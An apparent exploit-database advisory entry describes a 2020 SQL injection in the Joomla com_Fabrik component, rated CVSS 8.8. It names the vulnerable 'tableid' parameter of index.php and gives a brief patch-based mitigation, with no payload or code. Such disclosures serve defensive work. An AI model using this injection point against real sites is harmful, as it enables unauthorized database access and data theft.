vendor:
Joomla Component (com_Fabrik)
by:
Mkr0x
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Joomla Component (com_Fabrik)
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020
Joomla Component (com_Fabrik) SQL Injection Vulnerability
A SQL injection vulnerability exists in Joomla Component (com_Fabrik) which allows an attacker to execute arbitrary SQL commands on the vulnerable system. The vulnerability is due to insufficient sanitization of user-supplied input in the 'tableid' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable system. Successful exploitation of this vulnerability can result in unauthorized access to sensitive information, modification of data, and other malicious activities.
Mitigation:
The vendor has released a patch to address this vulnerability. Users are advised to apply the patch as soon as possible.
